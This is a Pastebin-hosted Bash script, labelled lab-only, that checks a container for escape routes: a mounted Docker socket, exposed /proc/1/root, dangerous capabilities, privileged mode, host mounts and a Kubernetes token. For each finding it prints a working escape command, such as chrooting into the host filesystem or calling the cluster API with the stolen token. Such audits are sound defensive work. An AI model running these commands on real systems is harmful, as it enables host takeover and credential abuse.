API tools faq
paste
orenma

Untitled

orenma
Aug 14th, 2025
186
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 2.78 KB | None | 0 0
raw download clone embed print report
  1. echo "==== Container Escape Safety Check (Lab Only) ===="
  2. apk add jq
  3.  
  4. function suggest_exploit() {
  5.   local reason=$1
  6.   local command=$2
  7.  
  8.   echo -e "\n[⚠️  Escape Path Detected: $reason]"
  9.   echo -e "[💡 Suggested Command for Lab Use Only]"
  10.   echo -e "    $command"
  11. }
  12.  
  13. function check_path() {
  14.   local path=$1
  15.   local explanation=$2
  16.   if [ -e "$path" ]; then
  17.     echo "[!] Found: $path - $explanation"
  18.     return 0
  19.   else
  20.     echo "[+] Not found: $path - Safe"
  21.     return 1
  22.   fi
  23. }
  24.  
  25. function check_docker_socket() {
  26.   echo "[*] Checking Docker socket..."
  27.   if [ -S /var/run/docker.sock ]; then
  28.     echo "[!] Docker socket is mounted inside the container"
  29.     suggest_exploit "Docker socket exposure" \
  30.       "docker -H unix:///var/run/docker.sock run -v /:/mnt --rm -it alpine chroot /mnt sh"
  31.   else
  32.     echo "[+] Docker socket not found - Safe"
  33.   fi
  34. }
  35.  
  36. function check_host_proc_access() {
  37.   if check_path "/proc/1/root" "Can allow access to host filesystem if not namespaced"; then
  38.     suggest_exploit "/proc/1/root exposed" \
  39.       "chroot /proc/1/root /bin/sh"
  40.   fi
  41. }
  42.  
  43. function check_cap_sys_admin() {
  44.   echo "[*] Checking capabilities..."
  45.   if capsh --print | grep -qE "cap_sys_admin|cap_sys_ptrace"; then
  46.     echo "[!] Container has SYS_ADMIN or PTRACE - Dangerous capabilities available"
  47.     suggest_exploit "SYS_ADMIN + mounted host path" \
  48.       "mount -t proc proc /host/proc && chroot /host sh"
  49.   else
  50.     echo "[+] SYS_ADMIN and PTRACE not found - Safe"
  51.   fi
  52. }
  53.  
  54. function check_privileged_mode() {
  55.   echo "[*] Checking for privileged mode..."
  56.   if grep -q 'CapEff: ffffffff' /proc/self/status; then
  57.     echo "[!] Container likely running in privileged mode"
  58.     suggest_exploit "Privileged container" \
  59.       "mkdir /tmp/host; mount /dev/sda1 /tmp/host && chroot /tmp/host"
  60.   else
  61.     echo "[+] Container is not in full privileged mode"
  62.   fi
  63. }
  64.  
  65. function check_host_mount() {
  66.   if mount | grep -q '/host'; then
  67.     echo "[!] Host filesystem appears mounted under /host"
  68.     suggest_exploit "Host mount detected" \
  69.       "chroot /host /bin/bash"
  70.   fi
  71. }
  72.  
  73. function check_k8s_token() {
  74.   if [ -f /var/run/secrets/kubernetes.io/serviceaccount/token ]; then
  75.     echo "[!] Kubernetes service token found"
  76.     suggest_exploit "K8s API abuse via service token" \
  77.       "curl -s --header \"Authorization: Bearer \$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)\" https://kubernetes.default"
  78.   else
  79.     echo "[+] No K8s service account token found"
  80.   fi
  81. }
  82.  
  83. echo ""
  84. check_path "/dev/mem" "Can lead to host memory read/write if privileged"
  85. check_host_proc_access
  86. check_host_mount
  87. check_cap_sys_admin
  88. check_privileged_mode
  89. check_docker_socket
  90. check_k8s_token
  91.  
  92. echo ""
  93. echo "==== Check Complete. Use responsibly in lab environments only. ===="
Advertisement
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!